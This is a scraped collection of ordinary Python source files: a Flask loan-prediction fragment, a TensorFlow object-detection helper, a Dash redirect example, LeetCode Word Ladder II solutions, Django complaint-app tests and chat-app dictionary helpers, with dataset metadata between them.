'total_acc','longest_credit_length']] = dataset[['loan_amnt','int_rate','emp_length','annual_inc', 'dti', 'delinq_2yrs', 'revol_util', 'total_acc','longest_credit_length']]\n\n dataset[['term','home_ownership','purpose','verification_status']]=dataset[['term','home_ownership','purpose','verification_status']].astype('object')\n\n dataset = dataset[['loan_amnt','term','int_rate','emp_length',\n 'annual_inc', 'dti', 'delinq_2yrs', 'revol_util', 'total_acc','longest_credit_length','home_ownership','purpose','verification_status']]\n model = pickle.load(open('Random_Forest.pkl', 'rb'))\n classifier=model.predict(dataset)\n predictions = [item for sublist in RF_cls for item in sublist]\n colors = ['#1f77b4','#ff7f0e']\n loan_status = ['Approved','Not Approved']\n return render_template('index.html',prediction_text=f'Your Loan is {loan_status}')\n\n p = figure(x_range=loan_status, plot_height=500,\n toolbar_location=None, title=\"Loan Status\", plot_width=800)\n p.vbar(x='loan_status', top='predictions', width=0.4, source=source, legend=\"loan_status\",\n line_color='black', fill_color=factor_cmap('loan_status', palette=colors, factors=loan_status))\n\n\n p.xgrid.grid_line_color = None\n p.y_range.start = 0.1\n p.y_range.end = 0.9\n p.legend.orientation = \"horizontal\"\n p.legend.location = \"top_center\"\n p.xaxis.axis_label = 'Loan Status'\n p.yaxis.axis_label = ' Predicted Probabilities'\n script, div = components(p)\n return render_template('result.html',script=script,div=div)\n\n\n\n\nif __name__==\"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"267341492","text":"import numpy as np\nimport pandas as pd\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\n\nfrom distutils.version import StrictVersion\nfrom collections import defaultdict\nfrom io import StringIO\n# from matplotlib import pyplot as plt\nfrom PIL import Image\nfrom object_detection.utils import ops as utils_ops\n\nif StrictVersion(tf.__version__) < StrictVersion('1.9.0'):\n raise ImportError('Please upgrade your TensorFlow installation to v1.9.* or later!')\n\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\n\n#HELPERS\ndef load_image_into_numpy_array(image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\ndef run_inference_for_single_image(image, graph):\n with graph.as_default():\n with tf.Session() as sess:\n # Get handles to input and output tensors\n ops = tf.get_default_graph().get_operations()\n all_tensor_names = {output.name for op in ops for output in op.outputs}\n tensor_dict = {}\n for key in [\n 'num_detections', 'detection_boxes', 'detection_scores',\n 'detection_classes', 'detection_masks'\n ]:\n tensor_name = key + ':0'\n if tensor_name in all_tensor_names:\n tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(\n tensor_name)\n if 'detection_masks' in tensor_dict:\n # The following processing is only for single image\n detection_boxes = tf.squeeze(tensor_dict['detection_boxes'], [0])\n detection_masks = tf.squeeze(tensor_dict['detection_masks'], [0])\n # Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.\n real_num_detection = tf.cast(tensor_dict['num_detections'][0], tf.int32)\n detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])\n detection_masks = tf.slice(detection_masks, [0, 0, 0], [real_num_detection, -1, -1])\n detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(\n detection_masks, detection_boxes, image.shape[0], image.shape[1])\n detection_masks_reframed = tf.cast(\n tf.greater(detection_masks_reframed, 0.5), tf.uint8)\n # Follow the convention by adding back the batch dimension\n tensor_dict['detection_masks'] = tf.expand_dims(\n detection_masks_reframed, 0)\n image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')\n\n # Run inference\n output_dict = sess.run(tensor_dict,\n feed_dict={image_tensor: np.expand_dims(image, 0)})\n\n # all outputs are float32 numpy arrays, so convert types as appropriate\n output_dict['num_detections'] = int(output_dict['num_detections'][0])\n output_dict['detection_classes'] = output_dict[\n 'detection_classes'][0].astype(np.uint8)\n output_dict['detection_boxes'] = output_dict['detection_boxes'][0]\n output_dict['detection_scores'] = output_dict['detection_scores'][0]\n if 'detection_masks' in output_dict:\n output_dict['detection_masks'] = output_dict['detection_masks'][0]\n return output_dict\n\ndef image_list(images, dummy_text, PATH_TO_TEST_IMAGES_DIR):\n\tTEST_IMAGE_PATHS = []\n\tcount = 1\n\twhile count < images:\n\t\tlength = len(str(count))\n\t\tdummy_num = ''\n\t\tif length < 5:\n\t\t\tnum = 5 - length\n\t\t\twhile num != 0:\n\t\t\t\tdummy_num = dummy_num + '0'\n\t\t\t\tnum = num - 1\n\t\tfilename = dummy_text + dummy_num + str(count) + '.jpg'\n\t\t# print(filename)\n\t\tTEST_IMAGE_PATHS.append(os.path.join('datasets/' + PATH_TO_TEST_IMAGES_DIR, filename))\n\t\tcount = count + 1\n\treturn TEST_IMAGE_PATHS\n\n\ndef update_data(output_dict, data, image_path):\n\ttemp = data\n\tbox_ctr = 0;\n\tbox_count = output_dict['num_detections']\n\tif box_count == 0:\n\t \tinfo = (image_path[-11:-4], 0, '', '', '', '', '', '')\n\t \ttemp.append(info) \n\t\n\twhile box_ctr < box_count :\n\t \txmin = output_dict['detection_boxes'][box_ctr][1]\n\t \txmax = output_dict['detection_boxes'][box_ctr][3]\n\t \tymin = output_dict['detection_boxes'][box_ctr][0]\n\t \tymax = output_dict['detection_boxes'][box_ctr][2]\n\t \tobj_class = output_dict['detection_classes'][box_ctr]\n\t \tobj_score = output_dict['detection_scores'][box_ctr]\n\n\t \tif box_ctr == 0:\n\t \t\tinfo = (image_path[-11:-4], box_count, obj_class, obj_score, xmin, xmax, ymin, ymax)\n\t \telse:\n\t \t\tinfo = ('', '', obj_class, obj_score, xmin, xmax, ymin, ymax)\n\n\t \ttemp.append(info)\n\t \tbox_ctr = box_ctr + 1\n\n\treturn temp\n\ndef tensorflow_detection(MODEL_NAME, FROZEN_GRAPH, LABELS, info):\n\n\t# Faster R-CNN Model\n\t# MODEL_NAME = 'faster_rcnn_resnet50_coco_2018_01_28'\n\t\n\t# Path to frozen detection graph. This is the actual model that is used for the object detection.\n\tPATH_TO_FROZEN_GRAPH = os.path.join('parameters', MODEL_NAME, FROZEN_GRAPH)\n\n\t# List of the strings that is used to add correct label for each box.\n\tPATH_TO_LABELS = os.path.join('parameters', 'data', LABELS)\n\n\t# LOAD MODEL INTO MEMORY\n\tdetection_graph = tf.Graph()\n\twith detection_graph.as_default():\n\t od_graph_def = tf.GraphDef()\n\t with tf.gfile.GFile(PATH_TO_FROZEN_GRAPH, 'rb') as fid:\n\t serialized_graph = fid.read()\n\t od_graph_def.ParseFromString(serialized_graph)\n\t tf.import_graph_def(od_graph_def, name='')\n\n\t#Label Map\n\tcategory_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True)\n\timages = info['images']\n\tdummy_text = info['dummy_text']\n\tdirectory = info['directory']\n\n\tTEST_IMAGE_PATHS = image_list(images, dummy_text, directory)\n\tif not TEST_IMAGE_PATHS:\n\t\treturn pd.DataFrame()\n\n\t# Size, in inches, of the output images.\n\tIMAGE_SIZE = (12, 8)\n\n\tdata = []\n\tcount = 1\n\tfor image_path in TEST_IMAGE_PATHS:\n\t print(\"image\" + str(count) + \" processing\")\n\t print(str(float(100 * count) / images) + \"%\")\n\t image = Image.open(image_path)\n\t # the array based representation of the image will be used later in order to prepare the\n\t # result image with boxes and labels on it.\n\t image_np = load_image_into_numpy_array(image)\n\t # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n\t image_np_expanded = np.expand_dims(image_np, axis=0)\n\t # Actual detection.\n\t output_dict = run_inference_for_single_image(image_np, detection_graph)\n\t \n\t # Visualization of the results of a detection.\n\t # vis_util.visualize_boxes_and_labels_on_image_array(\n\t # image_np,\n\t # output_dict['detection_boxes'],\n\t # output_dict['detection_classes'],\n\t # output_dict['detection_scores'],\n\t # category_index,\n\t # instance_masks=output_dict.get('detection_masks'),\n\t # use_normalized_coordinates=True,\n\t # line_thickness=8)\n\t # plt.figure(figsize=IMAGE_SIZE)\n\t # plt.imshow(image_np)\n\t # print(output_dict)\n\t \n\t data = update_data(output_dict, data, image_path)\n\t count = count + 1\n\t\n\tprint('')\n\tcols = ['Image', 'NumDetected', 'Class', 'Score', 'xmin', 'xmax', 'ymin', 'ymax']\n\tdf = pd.DataFrame(data, columns=cols)\n\treturn df\n\n\n\ndef structured_output(MODEL_NAME, FROZEN_GRAPH, LABELS, image_path):\n\n\tPATH_TO_FROZEN_GRAPH = os.path.join('parameters', MODEL_NAME, FROZEN_GRAPH)\n\tPATH_TO_LABELS = os.path.join('parameters', 'data', LABELS)\n\t\n\tdetection_graph = tf.Graph()\n\twith detection_graph.as_default():\n\t od_graph_def = tf.GraphDef()\n\t with tf.gfile.GFile(PATH_TO_FROZEN_GRAPH, 'rb') as fid:\n\t serialized_graph = fid.read()\n\t od_graph_def.ParseFromString(serialized_graph)\n\t tf.import_graph_def(od_graph_def, name='')\n\n\tcategory_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True)\n\n\tIMAGE_SIZE = (12, 8)\n\n\timage = Image.open(image_path)\n\timage_np = load_image_into_numpy_array(image)\n\timage_np_expanded = np.expand_dims(image_np, axis=0)\n\toutput_dict = run_inference_for_single_image(image_np, detection_graph)\n\n\td = {}\n\tbox_ctr = 0;\n\tbox_count = output_dict['num_detections']\n\tif box_count == 0:\n\t \treturn {}\n\t\n\tcurr_class = int(output_dict['detection_classes'][box_ctr])\n\tclass_num = 0\n\twhile box_ctr < box_count :\n\t\tobj_score = output_dict['detection_scores'][box_ctr]\n\t\txmin = output_dict['detection_boxes'][box_ctr][1]\n\t\txmax = output_dict['detection_boxes'][box_ctr][3]\n\t\tymin = output_dict['detection_boxes'][box_ctr][0]\n\t\tymax = output_dict['detection_boxes'][box_ctr][2]\n\t\tobj_class = output_dict['detection_classes'][box_ctr]\n\n\t\tif int(curr_class) != int(obj_class):\n\t\t\tcurr_class = int(obj_class)\n\t\t\tclass_num = 1\n\t\telse:\n\t\t\tclass_num = class_num + 1\n\n\t\tobj = {'P-Score': obj_score, 'box': {'xmin': xmin, 'xmax': xmax, 'ymin': ymin, 'ymax': ymax}}\n\t\tname = 'obj-' + str(curr_class) + '.0' '-' + str(class_num)\n\t\tdd = {name: obj}\n\n\t\tclass_name = str(curr_class) + '.0'\n\t\tif curr_class not in d:\n\t\t\td[class_name] = dd\n\t\telse:\n\t\t\td[class_name].update(dd)\n\t\tbox_ctr = box_ctr + 1\n\n\treturn d\n\n\n\n","sub_path":"basic_detection.py","file_name":"basic_detection.py","file_ext":"py","file_size_in_byte":8928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"15670381","text":"import autolink\nimport dash\nimport dash_html_components as html\n\napp = dash.Dash('')\n\napp.scripts.config.serve_locally = True\n\napp.layout = html.Div([\n autolink.Redirect(\n \"I will auto change location path\",\n id='input',\n href='',\n refresh=True\n ),\n html.Button(\"go to google\",id=\"click_me_to_go\")\n])\n\n@app.callback(\n\tdash.dependencies.Output('input', 'href'),\n\t[dash.dependencies.Input('click_me_to_go', 'n_clicks')])\ndef display_output(value):\n return \"www.google.com\"\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","sub_path":"usage.py","file_name":"usage.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"625135885","text":"\"\"\"\nGiven two words (beginWord and endWord), and a dictionary's word list, find all shortest transformation sequence(s) from beginWord to endWord, such that:\n\nOnly one letter can be changed at a time\nEach transformed word must exist in the word list. Note that beginWord is not a transformed word.\nFor example,\n\nGiven:\nbeginWord = \"hit\"\nendWord = \"cog\"\nwordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]\nReturn\n [\n [\"hit\",\"hot\",\"dot\",\"dog\",\"cog\"],\n [\"hit\",\"hot\",\"lot\",\"log\",\"cog\"]\n ]\nNote:\nReturn an empty list if there is no such transformation sequence.\nAll words have the same length.\nAll words contain only lowercase alphabetic characters.\nYou may assume no duplicates in the word list.\nYou may assume beginWord and endWord are non-empty and are not the same.\nUPDATE (2017/1/20):\nThe wordList parameter had been changed to a list of strings (instead of a set of strings). Please reload the code definition to get the latest changes.\n\"\"\"\n\"\"\"\n而对于这道加强版来说,还需要输出所有符合最短长度的变换的路径,这道题的时间要求非常BT。。所以基本的解题思想是“\n\n1、首先和127的方式一样,使用BFS遍历,不过这次的主要目的是记录出每个单词的最短变换长度(高度),即从start开始变换多少步可以到达 \n2、使用dfs的方式,从endword开始,根据1得到的高度按照深度优先的方式进行路径查找,当找到startword后加入一条路径(注意dfs方法里\n的beginword endword和原题的相反,答案也要做翻转)\n\n\n\"\"\"\n\nfrom string import ascii_lowercase\nfrom collections import defaultdict\nclass Solution:\n def findLadders(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: List[str]\n :rtype: List[List[str]]\n \"\"\"\n visited = defaultdict(set)\n q = [beginWord]\n wordList = set(wordList)\n level = 1\n while len(q) > 0:\n newQ = []\n if endWord in q:\n break\n level_map = defaultdict(set) \n for cur in q:\n for i in range(len(cur)):\n for c in ascii_lowercase: \n newW = cur[:i] + c + cur[i + 1:] \n if newW == cur:\n continue\n if newW not in wordList or newW in visited:\n continue\n if newW not in level_map:\n newQ.append(newW)\n level_map[newW].add(cur)\n visited.update(level_map)\n q = newQ\n paths = [] \n def dfs(word, path):\n if word == beginWord:\n paths.append(path[::-1])\n else:\n for parent in visited[word]:\n path.append(parent)\n dfs(parent, path)\n path.pop()\n dfs(endWord, [endWord])\n return paths\n\n\n\n\n\nfrom collections import deque\nfrom string import ascii_lowercase\nimport sets\nclass Node(object):\n def __init__(self, word):\n self.word = word\n self.parents = []\nclass Solution(object):\n def findLadders(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: List[str]\n :rtype: List[List[str]]\n \"\"\"\n wordList.append(beginWord)\n wordList = set(wordList)\n q, visitedMap, level = [], {}, 0\n q.append(beginWord)\n visitedMap[beginWord] = Node(beginWord)\n while len(q) > 0 :\n size = len(q)\n level += 1\n # print level, map(lambda a: a.word, q)\n if endWord in q:\n break\n new_q = []\n for word in q:\n node = visitedMap[word] \n for i in range(len(word)):\n for c in ascii_lowercase:\n #same word\n if c == word[i]:\n continue\n newWord = word[:i] + c + word[i+1:]\n if newWord not in wordList:\n continue \n if newWord not in visitedMap:\n visitedMap[newWord] = Node(newWord)\n new_q.append(newWord)\n if newWord in new_q:\n visitedMap[newWord].parents.append(node)\n q = new_q\n if endWord not in visitedMap:\n return []\n stk, array, res = [], [\"\" for _ in range(level)], []\n stk.append((visitedMap[endWord], 0))\n # print level, map(lambda word: (word, map(lambda a: a.word, visitedMap[word].parents)), visitedMap.keys())\n while len(stk) > 0:\n node, height = stk.pop()\n # print node.word, height, map(lambda a: a.word, node.parents)\n array[height] = node.word\n if height == level - 1 and node.word == beginWord:\n res.append(array[::-1])\n for parent in node.parents:\n stk.append((parent, height + 1))\n return res\n \n \nimport sets\nfrom collections import deque\nfrom string import ascii_lowercase\nclass DAGNode(object):\n def __init__(self, word):\n self.word = word\n self.parents = []\n\nclass Solution(object):\n def findLadders(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: List[str]\n :rtype: List[List[str]]\n \"\"\"\n wordSet = set(wordList)\n s, m, q = set(), {}, deque()\n m[beginWord] = DAGNode(beginWord)\n q.append(m[beginWord])\n while len(q) > 0:\n m = {}\n size = len(q)\n for i in range(size):\n node = q.popleft()\n word = node.word\n for i in range(len(word)):\n for c in ascii_lowercase:\n new_word = word[:i] + c + word[i + 1:]\n if new_word not in wordSet:\n continue\n if new_word in s:\n continue\n if new_word not in m: \n m[new_word] = DAGNode(new_word)\n q.append(m[new_word])\n m[new_word].parents.append(node)\n for word, node in m.items():\n s.add(word)\n if endWord in m:\n break\n path, res = [], []\n def walk(node):\n path.append(node.word)\n if node.word == beginWord:\n res.append(path[::-1])\n for pNode in node.parents:\n walk(pNode)\n path.pop()\n if endWord in m:\n walk(m[endWord])\n return res\n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"interview/others/hard/LC126. Word Ladder II.py","file_name":"LC126. Word Ladder II.py","file_ext":"py","file_size_in_byte":7138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"126005218","text":"from django.contrib.auth.models import User\nfrom django.test import TestCase, RequestFactory\nfrom django.urls import resolve\nfrom django.core.management import call_command\n\nfrom apps.core_app.vars import TODAY\nfrom apps.complaint.models import Complaint, TypeComplaint\n# class Views\nfrom .views import (\n ComplaintView,\n ComplaintPublicationView,\n)\nfrom .views import (\n complaint_view,\n complaint_publication_view,\n personal_complaint_view,\n police_complaint_view,\n complaint_that_follow_view)\n\n\nclass ComplaintModelTest(TestCase):\n\n def test_saving_and_retrieving_complaints(self):\n registered = 0\n first_complaint = Complaint.objects.create(\n complainant_name=\"Andres Gutierrez\",\n place_event=\"Mayor rocha ayacucho\",\n event_date='2018-05-31',\n event_time='00:00',\n description='urto de licencia de parte de policias de transito')\n registered += 1\n\n second_complaint = Complaint.objects.create(\n complainant_name=\"Alvaro Gutierrez\",\n place_event=\"Mexico ayacucho\",\n event_date='2018-05-29',\n event_time='09:00',\n description='urto de licencia de parte de policias de transito',\n license_plate='AVE-001')\n registered += 1\n\n self.assertEqual(registered,\n Complaint.objects.all().count())\n\n self.assertEqual(first_complaint,\n Complaint.objects.get(id=first_complaint.id))\n\n self.assertEqual(second_complaint,\n Complaint.objects.get(id=second_complaint.id))\n\n\nclass ComplaintViewTest(TestCase):\n\n def test_complaint_url_resolve_to_form_complaint(self):\n found = resolve('/complaint')\n self.assertEqual(found.func, complaint_view)\n\n def test_uses_complaint_template(self):\n response = self.client.get('/complaint')\n self.assertTemplateUsed(response, ComplaintView.template_name)\n\n def test_register_with_POST_request(self):\n self.generate_type_complaint()\n registered = 0\n self.assertEqual(registered, Complaint.objects.all().count())\n data = {\n 'complainant_name': 'Test name',\n 'place_event': 'Test plave event',\n 'event_date': TODAY.strftime('%d/%m/%Y'),\n 'event_time': '12:00',\n 'description': 'test description bla bla bla bla',\n 'license_plate': 'ASDS123'\n }\n self.client.post('/complaint', data)\n registered += 1\n self.assertEqual(registered, Complaint.objects.all().count())\n\n def generate_type_complaint(self):\n type_registered = 0\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n TypeComplaint.objects.create(\n type='Transito',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n TypeComplaint.objects.create(\n type='Personal',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n TypeComplaint.objects.create(\n type='Policial',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n\n\nclass PublicationComplaintsView(TestCase):\n\n def setUp(self):\n self.complaint: Complaint\n self.user: User\n self.factory = RequestFactory()\n self.url = '/complaint/publications'\n\n def test_url_resolve_publications_complaints(self):\n found = resolve('/complaint/publications')\n self.assertEqual(found.func, complaint_publication_view)\n\n def test_uses_publications_complaints_template(self):\n response = self.client.get('/complaint/publications')\n self.assertTemplateUsed(response, ComplaintPublicationView.template_name)\n\n def test_follow_one_complaint(self):\n complaints_registered = 0\n self.number_complaints_test(complaints_registered)\n self.add_complaints(complaints_registered)\n\n self.user = self.create_user()\n self.client.force_login(self.user)\n\n response = self.client.post(self.url,\n {'add_follower': True, 'complaint_id': self.complaint.id},\n HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n self.assertEqual(response.status_code, 200)\n\n self.complaint = Complaint.objects.get(id=self.complaint.id)\n self.assertEqual(self.complaint.followers, 1)\n\n def number_complaints_test(self, complaints_registered):\n self.assertEqual(complaints_registered, Complaint.objects.all().count())\n\n def add_complaints(self, complaints_registered, iterate=1):\n for i in range(iterate):\n self.complaint = self.create_complaint()\n complaints_registered += 1\n self.assertEqual(complaints_registered, Complaint.objects.all().count())\n\n def create_user(self) -> User:\n return User.objects.create(username='admin', password='admin123')\n\n def create_complaint(self) -> Complaint:\n return Complaint.objects.create(\n complainant_name=\"Alvaro Gutierrez\",\n place_event=\"Mexico ayacucho\",\n event_date='2018-05-29',\n event_time='09:00',\n description='urto de licencia de parte de policias de transito',\n license_plate='AVE-001')\n\n\nclass PersonalComplaintTest(TestCase):\n\n def test_personal_complaint_url(self):\n found = resolve('/personal_complaint')\n self.assertEqual(found.func, personal_complaint_view)\n\n def test_register_with_POST_request(self):\n call_command('flush', '--no-input')\n self.generate_type_complaint()\n registered = 0\n self.assertEqual(registered, Complaint.objects.all().count())\n data = {\n 'complainant_name': 'Test name',\n 'place_event': 'Test plave event',\n 'event_date': TODAY.strftime('%d/%m/%Y'),\n 'event_time': '12:00',\n 'description': 'test description bla bla bla bla',\n }\n self.client.post('/personal_complaint', data)\n registered += 1\n self.assertEqual(registered, Complaint.objects.all().count())\n\n def generate_type_complaint(self):\n type_registered = 0\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n TypeComplaint.objects.create(\n type='Transito',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n TypeComplaint.objects.create(\n type='Personal',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n TypeComplaint.objects.create(\n type='Policial',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n\n\nclass PoliceComplaintTest(TestCase):\n\n def test_police_complaint_url(self):\n found = resolve('/police_complaint')\n self.assertEqual(found.func, police_complaint_view)\n\n def test_register_with_POST_request(self):\n call_command('flush', '--no-input')\n self.generate_type_complaint()\n registered = 0\n self.assertEqual(registered, Complaint.objects.all().count())\n data = {\n 'complainant_name': 'Test name',\n 'place_event': 'Test plave event',\n 'event_date': TODAY.strftime('%d/%m/%Y'),\n 'event_time': '12:00',\n 'description': 'test description bla bla bla bla',\n }\n self.client.post('/police_complaint', data)\n registered += 1\n self.assertEqual(registered, Complaint.objects.all().count())\n\n def generate_type_complaint(self):\n type_registered = 0\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n TypeComplaint.objects.create(\n type='Transito',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n TypeComplaint.objects.create(\n type='Personal',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n TypeComplaint.objects.create(\n type='Policial',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n\n\nclass ComplaintThatFollow(TestCase):\n\n def setUp(self):\n self.complaints: [Complaint]\n self.user: User\n self.factory = RequestFactory()\n\n def test_url_resolve(self):\n call_command('flush', '--no-input')\n self.user = self.create_user()\n self.client.force_login(self.user)\n found = resolve(f'/follow_complaints')\n self.assertEqual(found.func, complaint_that_follow_view)\n\n def test_get_response(self):\n call_command('flush', '--no-input')\n complaints_in_database = 0\n news_complaints = 4\n self.follow_complaints(complaints_in_database, news_complaints)\n self.client.force_login(self.user)\n response = self.client.get(f'/follow_complaints')\n self.assertEqual(len(response.context['complaints']), news_complaints)\n\n def follow_complaints(self, complaints_in_database, news_complaints):\n self.user = self.create_user()\n self.add_complaints(complaints_in_database, news_complaints)\n for complaint in Complaint.objects.all():\n ComplaintPublicationView().start_follow(self.user, complaint.id)\n\n\n def add_complaints(self, complaints_registered, iterate=1):\n for i in range(iterate):\n self.complaint = self.create_complaint()\n complaints_registered += 1\n self.assertEqual(complaints_registered, Complaint.objects.all().count())\n\n def create_user(self) -> User:\n return User.objects.create(username='admin', password='admin123')\n\n def create_complaint(self) -> Complaint:\n return Complaint.objects.create(\n complainant_name=\"Alvaro Gutierrez\",\n place_event=\"Mexico ayacucho\",\n event_date='2018-05-29',\n event_time='09:00',\n description='urto de licencia de parte de policias de transito',\n license_plate='AVE-001')\n\n","sub_path":"apps/complaint/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":10530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"651951899","text":"def user_dict(userInfo):\n # user_id, first_name, last_name, email, phone\n user = {}\n user[\"user_id\"] = userInfo[0]\n user[\"first_name\"] = userInfo[1]\n user[\"last_name\"] = userInfo[2]\n user[\"email\"] = userInfo[3]\n user[\"phone\"] = userInfo[4]\n return user\n\n\ndef credential_dict(userCredential):\n # username, password, user_id\n credential = {}\n credential[\"username\"] = userCredential[0]\n credential[\"password\"] = userCredential[1]\n credential[\"user_id\"] = userCredential[2]\n return credential\n\n\ndef activity_dict(userActivity):\n # activity_id, user_id, activity_date, activity_time\n activity = {}\n activity[\"activity_id\"] = userActivity[0]\n activity[\"user_id\"] = userActivity[1]\n activity[\"activity_date\"] = userActivity[2]\n return activity\n\n\ndef contactList_dict(userContactList):\n # user_id, contact_id\n contactList = {}\n contactList[\"user_id\"] = userContactList[0]\n contactList[\"contact_id\"] = userContactList[1]\n return contactList\n\n\n# Dict used for demo\ndef contacts_dict(userContact):\n # contact_id, first_name, last_name\n contacts = {}\n contacts[\"user_id\"] = userContact[0]\n contacts[\"username\"] = userContact[1]\n contacts[\"first_name\"] = userContact[2]\n contacts[\"last_name\"] = userContact[3]\n return contacts\n\n\ndef chat_dict(chatInfo):\n # chat_id, chat_name, admin\n chat = {}\n chat[\"chat_id\"] = chatInfo[0]\n chat[\"chat_name\"] = chatInfo[1]\n chat[\"admin\"] = chatInfo[2]\n return chat\n\n\ndef chatUI_dict(chatInfo):\n # chat_id, chat_name, admin\n chat = {}\n chat[\"chat_id\"] = chatInfo[0]\n chat[\"chat_name\"] = chatInfo[1]\n chat[\"admin\"] = chatInfo[2]\n chat[\"first_name\"] = chatInfo[3]\n chat[\"last_name\"] = chatInfo[4]\n return chat\n\n\n# Dict use for demo\ndef post_msg_chat_dict(postChatInfo):\n # chat_id, chat_name, admin\n post_chat = {}\n post_chat[\"post_id\"] = postChatInfo[0]\n post_chat[\"post_msg\"] = postChatInfo[1]\n post_chat[\"user_id\"] = postChatInfo[2]\n post_chat[\"first_name\"] = postChatInfo[3]\n post_chat[\"last_name\"] = postChatInfo[4]\n return post_chat\n\n\n# Dict use for UI\ndef post_msg_chat_dict_UI(postChatInfo):\n # chat_id, chat_name, admin\n post_chat_UI = {}\n post_chat_UI[\"chatId\"] = postChatInfo[0]\n post_chat_UI[\"postId\"] = postChatInfo[1]\n post_chat_UI[\"createdById\"] = postChatInfo[2]\n post_chat_UI[\"username\"] = postChatInfo[3]\n post_chat_UI[\"postMsg\"] = postChatInfo[4]\n post_chat_UI[\"postDate\"] = postChatInfo[5]\n post_chat_UI[\"mediaId\"] = postChatInfo[6]\n post_chat_UI[\"mediaLocation\"] = postChatInfo[7]\n post_chat_UI[\"likes\"] = postChatInfo[8]\n post_chat_UI[\"dislikes\"] = postChatInfo[9]\n return post_chat_UI\n\n\ndef post_msg_chat_dict_UI_2(postChatInfo, replies):\n # chat_id, chat_name, admin\n post_chat_UI = {}\n post_chat_UI[\"chatId\"] = postChatInfo[0]\n post_chat_UI[\"postId\"] = postChatInfo[1]\n post_chat_UI[\"createdById\"] = postChatInfo[2]\n post_chat_UI[\"username\"] = postChatInfo[3]\n post_chat_UI[\"postMsg\"] = postChatInfo[4]\n post_chat_UI[\"postDate\"] = postChatInfo[5]\n post_chat_UI[\"mediaId\"] = postChatInfo[6]\n post_chat_UI[\"mediaLocation\"] = postChatInfo[7]\n post_chat_UI[\"likes\"] = postChatInfo[8]\n post_chat_UI[\"dislikes\"] = postChatInfo[9]\n post_chat_UI[\"replies\"] = replies\n\n return post_chat_UI\n\n\ndef participants_dict(chatParticipant):\n # chat_id, user_id\n participant = {}\n participant[\"chat_id\"] = chatParticipant[0]\n participant[\"user_id\"] = chatParticipant[1]\n return participant\n\n\n# Dict used for demo\ndef chat_participants_dict(chatParticipant):\n # chat_id, user_id\n chat_participants = {}\n chat_participants[\"user_id\"] = chatParticipant[0]\n chat_participants[\"username\"] = chatParticipant[1]\n chat_participants[\"first_name\"] = chatParticipant[2]\n chat_participants[\"last_name\"] = chatParticipant[3]\n return chat_participants\n\n\n# Dict used for demo\ndef chat_admin_dict(chatAdmin):\n # chat_id, user_id\n admin = {}\n admin[\"admin\"] = chatAdmin[0]\n admin[\"first_name\"] = chatAdmin[1]\n admin[\"last_name\"] = chatAdmin[2]\n return admin\n\n\ndef post_dict(chatPost):\n # post_id, post_msg, post_date, post_time, user_id, chat_id\n post = {}\n post[\"post_id\"] = chatPost[0]\n post[\"post_msg\"] = chatPost[1]\n post[\"post_date\"] = chatPost[2]\n post[\"user_id\"] = chatPost[3]\n post[\"chat_id\"] = chatPost[4]\n return post\n\n\ndef reaction_dict(postReaction):\n # user_id, post_id, react_date, react_time, react_type\n reaction = {}\n reaction[\"user_id\"] = postReaction[0]\n reaction[\"post_id\"] = postReaction[1]\n reaction[\"react_date\"] = postReaction[1]\n reaction[\"react_type\"] = postReaction[2]\n return reaction\n\n\n# Dict used for demo\ndef reaction_user_dict(joinReaction):\n # user_id, first_name, last_name, react_date\n reaction_user = {}\n reaction_user[\"user_id\"] = joinReaction[0]\n reaction_user[\"username\"] = joinReaction[1]\n reaction_user[\"first_name\"] = joinReaction[2]\n reaction_user[\"last_name\"] = joinReaction[3]\n reaction_user[\"react_date\"] = joinReaction[4]\n return 